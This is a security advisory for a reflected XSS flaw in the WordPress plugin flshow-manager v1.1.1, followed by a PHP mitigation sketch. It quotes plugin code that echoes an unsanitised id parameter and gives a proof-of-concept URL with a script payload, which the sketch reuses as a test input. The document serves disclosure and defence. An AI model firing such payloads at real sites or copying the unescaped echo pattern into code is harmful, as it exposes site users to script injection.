Advisory #: 410
Title: Reflected XSS in WordPress plugin flshow-manager v1.1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/flshow-manager
Downloads: 5637
Vendor Notified: 2016-02-09
Vendor Contact: plugins@wordpress.org
Plugin Name: flshow-manager
Vulnerability:
There is a reflected XSS vulnerability in the following PHP code in ./flshow-manager/flshow.php:

  495: <td><a href="<?php $this->media_upload_url( 'images' ); ?>&amp;id=<?php echo $_GET[ 'id' ]; ?>&amp;dequeue-existing=<?php echo $upload->ID; ?>" class="button-secondary dequeue-existing" id="dequeue-<?php echo $upload->ID; ?>">- <?php _e( 'Remove' ); ?></a></td>

  513: <td class="enqueue-column"><a href="<?php $this->media_upload_url( 'images' ); ?>&amp;id=<?php echo $_GET[ 'id' ]; ?>&amp;enqueue-existing=<?php echo $upload->ID; ?>" class="button-secondary enqueue-existing" id="existing-<?php echo $upload->ID; ?>">+ <?php _e( 'Add' ); ?></a></td>

The variable $_GET[ 'id' ] appears to send unsanitized data back to the user's browser.
CVE-ID: Not Released
File: ./flshow-manager/flshow.php
Exploit Code:
The exploit was derived from the first appearance of a vulnerable parameter in the code; there could be more, as shown above.
This is an untested autogenerated exploit:
  http://[target]/wp-content/plugins/flshow-manager/flshow.php?id="><script>alert(1);</script><"
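
Mitigation sketch (an added example, not code from the plugin or from the advisory author): the echo pattern from lines 495/513 beside a version that encodes the id value for the URL and escapes it for the href attribute. The function names, the base URL, and the assumption that id is a positive integer are hypothetical; inside WordPress, esc_attr() and absint() cover the escaping and integer coercion.

```php
<?php
// Added example; not flshow-manager code. $base and the function names are hypothetical.

// Pattern from flshow.php lines 495/513: the request value is echoed as-is.
function render_link_unsafe(string $base, string $id, int $uploadId): string
{
    return '<a href="' . $base . '&amp;id=' . $id
         . '&amp;dequeue-existing=' . $uploadId . '">- Remove</a>';
}

// Hardened: percent-encode the value for the query string, then HTML-escape
// the whole URL for the attribute context it is written into.
function render_link_safe(string $base, string $id, int $uploadId): string
{
    $href = $base . '&id=' . rawurlencode($id) . '&dequeue-existing=' . $uploadId;
    return '<a href="' . htmlspecialchars($href, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
         . '">- Remove</a>';
}

// Stricter option, assuming id is always a positive integer: reject anything else.
function parse_id(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

$base    = 'media-upload.php?tab=images';            // constructed placeholder URL
$samples = ['42', '"><script>alert(1);</script><"']; // second value is the advisory's test string

foreach ($samples as $raw) {
    $unsafe = render_link_unsafe($base, $raw, 7);
    $safe   = render_link_safe($base, $raw, 7);
    printf("input:    %s\n", $raw);
    printf("unsafe:   %s\n", $unsafe);
    printf("safe:     %s\n", $safe);
    printf("markup injected (unsafe/safe): %s/%s\n",
        strpos($unsafe, '<script') !== false ? 'yes' : 'no',
        strpos($safe, '<script') !== false ? 'yes' : 'no');
    printf("parse_id: %s\n\n", var_export(parse_id($raw), true));
}
```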